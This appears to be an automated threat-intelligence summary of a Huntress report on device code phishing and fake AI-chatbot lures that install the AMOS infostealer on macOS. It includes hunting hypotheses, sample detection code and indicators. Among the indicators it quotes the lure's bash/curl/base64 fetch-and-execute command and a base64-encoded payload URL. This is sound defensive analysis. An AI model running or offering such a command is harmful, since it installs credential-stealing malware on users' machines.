
Social Engineering Leveled Up. Has Your Security Program?

The article highlights the evolution of social engineering tactics, emphasizing how attackers abuse trusted workflows, AI platforms, and legitimate infrastructure like OAuth to bypass traditional security controls. Key threats include device code phishing campaigns like EvilTokens that bypass MFA for persistent access, and AI chatbot lures tricking macOS users into executing AMOS infostealer payloads via malicious terminal commands.

Confidence: medium · Analyzed: 2026-05-01
Actors: Railway campaign, EvilTokens, AMOS infostealer
Source: Huntress


What Happened

Cybercriminals are using highly deceptive tactics, such as fake AI chatbot instructions and legitimate Microsoft login prompts, to trick people into handing over access to their accounts and devices. Organizations using cloud services like Microsoft 365 and individuals using macOS are primarily targeted. This matters because these attacks easily bypass traditional security measures like multi-factor authentication (MFA) and antivirus software by blending in with normal, everyday activities. Organizations should monitor for unusual account behavior, speed up their response to security alerts, and train employees to be cautious of unexpected login prompts or copying commands from the internet.

Key Takeaways

  • Attackers are increasingly abusing trusted workflows, AI platforms, and legitimate infrastructure to bypass traditional prevention controls.
  • Device code phishing campaigns (e.g., EvilTokens) allow attackers to bypass MFA and gain persistent session tokens without stealing passwords.
  • Malicious instructions on fake AI chatbots (like ChatGPT clones) are tricking macOS users into executing terminal commands that install the AMOS infostealer.
  • Security programs must shift focus from pure prevention to resilience, emphasizing identity threat detection, behavioral monitoring, and rapid response.
  • Legitimate cloud platforms like Railway and Cloudflare are being weaponized to host Phishing-as-a-Service (PHaaS) infrastructure.

Affected Systems

  • macOS
  • Microsoft 365
  • Cloud Identity Platforms
  • OAuth Integrations

Attack Chain

Attackers leverage SEO poisoning or fake AI chatbot pages to present users with malicious terminal commands disguised as routine troubleshooting steps. For macOS users, executing these commands downloads and installs the AMOS infostealer. In parallel campaigns, attackers use Phishing-as-a-Service platforms like EvilTokens hosted on legitimate infrastructure (e.g., Railway) to initiate device code phishing. Victims are tricked into entering a Microsoft OAuth device code, granting the attacker persistent, MFA-bypassed session tokens to access corporate resources like email and SharePoint.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article discusses strategic detection concepts and behavioral patterns but does not provide specific YARA, Sigma, or other query-based detection rules.

Detection Engineering Assessment

  • EDR Visibility: Medium — EDR can catch the macOS bash/curl execution, but device code phishing occurs entirely in the cloud/identity provider layer, bypassing endpoint telemetry.
  • Network Visibility: Low — Traffic for device code phishing goes to legitimate Microsoft endpoints, and malicious payloads may be hosted on legitimate cloud infrastructure (Railway, Cloudflare).
  • Detection Difficulty: Hard — Attacks blend into normal workflows, utilizing legitimate OAuth flows and trusted infrastructure, making signature-based detection highly ineffective.

Required Log Sources

  • Azure AD Sign-in Logs
  • Azure AD Audit Logs
  • macOS Unified Log
  • EDR Process Telemetry

Hunting Hypotheses

  • Hypothesis: Look for unusual device code authentication flows in Azure AD logs, especially from unexpected locations or followed by immediate access to sensitive SharePoint/OneDrive resources. | Telemetry: Cloud Identity/Azure AD Logs | ATT&CK Stage: Credential Access | FP Risk: Medium
  • Hypothesis: Search for macOS endpoint telemetry showing bash executing curl commands that pipe base64 decoded strings directly into execution. | Telemetry: EDR Process Telemetry | ATT&CK Stage: Execution | FP Risk: Low
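As an added example (not code from the Huntress article or this summary), the two hunting hypotheses above expressed as detection logic over constructed sample events. The field names (protocol, country, resource, cmdline), the per-user known-country baseline and the 300-second window are assumptions to be mapped onto your own Azure AD sign-in and EDR process schemas.

```python
import re

# Constructed sample events (not real telemetry). Field names are assumptions modelled on
# Entra ID sign-in logs (authenticationProtocol == "deviceCode") and a generic EDR schema.
SIGNINS = [
    {"t": 0,   "user": "alice@example.com", "protocol": "deviceCode", "country": "US", "resource": "Office 365 Exchange Online"},
    {"t": 30,  "user": "alice@example.com", "protocol": "none",       "country": "US", "resource": "Office 365 SharePoint Online"},
    {"t": 500, "user": "bob@example.com",   "protocol": "deviceCode", "country": "NL", "resource": "Microsoft Graph"},
    {"t": 800, "user": "carol@example.com", "protocol": "deviceCode", "country": "US", "resource": "Azure Portal"},
    {"t": 820, "user": "carol@example.com", "protocol": "none",       "country": "US", "resource": "Office 365 Exchange Online"},
]
# Assumed per-user baseline of countries seen in normal sign-ins.
KNOWN_COUNTRIES = {"alice@example.com": {"US"}, "bob@example.com": {"US"}, "carol@example.com": {"US"}}
SENSITIVE = ("sharepoint", "onedrive")

def suspicious_device_code_signins(events, known, window=300):
    """Return (user, reasons) for each deviceCode sign-in that comes from an unexpected
    country or is followed within `window` seconds by SharePoint/OneDrive access."""
    hits = []
    for e in events:
        if e["protocol"] != "deviceCode":
            continue
        reasons = []
        if e["country"] not in known.get(e["user"], set()):
            reasons.append("unexpected_location")
        if any(f["user"] == e["user"] and e["t"] < f["t"] <= e["t"] + window
               and any(s in f["resource"].lower() for s in SENSITIVE) for f in events):
            reasons.append("sensitive_access_after_device_code")
        if reasons:
            hits.append((e["user"], reasons))
    return hits

# bash -c command lines that fetch with curl and decode base64 inline, the shape of the
# page's macOS lure: /bin/bash -c "$(curl -fsSL $(echo <base64_payload> | base64 -d))"
PIPED_DECODE = re.compile(r"\bbash\s+-c\b.*\bcurl\b.*\bbase64\s+(?:-d|-D|--decode)\b")

PROCESS_EVENTS = [  # constructed EDR process records; "QUJD" is just base64 for "ABC"
    {"host": "mac-01", "cmdline": '/bin/bash -c "$(curl -fsSL $(echo QUJD | base64 -d))"'},
    {"host": "mac-02", "cmdline": "/bin/bash -c 'brew update && brew upgrade'"},
    {"host": "mac-03", "cmdline": "/bin/bash -c 'echo QUJD | base64 -d'"},
]

def piped_base64_exec_hosts(events):
    """Hosts whose process telemetry shows the curl + inline base64 decode pattern."""
    return [e["host"] for e in events if PIPED_DECODE.search(e["cmdline"])]
```

Carol's device code sign-in is not flagged: it comes from a known country and the follow-on access is to Exchange, not SharePoint/OneDrive, which is the kind of benign case behind the "Medium" false-positive rating.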

Control Gaps

  • MFA Bypass via Device Code Phishing
  • Lack of Identity Threat Detection and Response (ITDR)
  • Over-reliance on static IOC blocking

Key Behavioral Indicators

  • Unexpected device code login events
  • Cross-tenant identity behavior anomalies
  • Terminal commands executing base64 decoded URLs

False Positive Assessment

  • High

Recommendations

Immediate Mitigation

  • Review Azure AD logs for anomalous device code authentication events.
  • Investigate macOS endpoints for recent execution of suspicious curl/bash commands.

Infrastructure Hardening

  • Implement Identity Threat Detection and Response (ITDR) capabilities.
  • Restrict or disable Microsoft device code flow if not required for business operations.

User Protection

  • Deploy EDR on macOS devices to monitor for suspicious terminal executions.
  • Implement cross-tenant visibility into identity and session behavior.

Security Awareness

  • Train users to recognize device code phishing lures and the dangers of copying terminal commands from AI chatbots or search results.
  • Establish clear ownership and response procedures for identity-based alerts to reduce response times.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1528 - Steal Application Access Token
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1199 - Trusted Relationship
  • T1550.004 - Use Alternate Authentication Material: Web Session Cookie

Additional IOCs

  • Domains:
    • putuartana[.]com - Domain hosting the AMOS infostealer payload.
  • Command Lines:
    • Purpose: Download and execute a malicious payload (AMOS infostealer) disguised as a macOS disk cleanup command. | Tools: bash, curl, base64, echo | Stage: Execution / Payload Delivery | /bin/bash -c "$(curl -fsSL $(echo <base64_payload> | base64 -d))"
  • Other:
    • aHR0cHM6Ly9wdXR1YXJ0YW5hLMNvbS9jbGVhbmRwdA== - Base64 encoded URL used in the malicious macOS terminal command.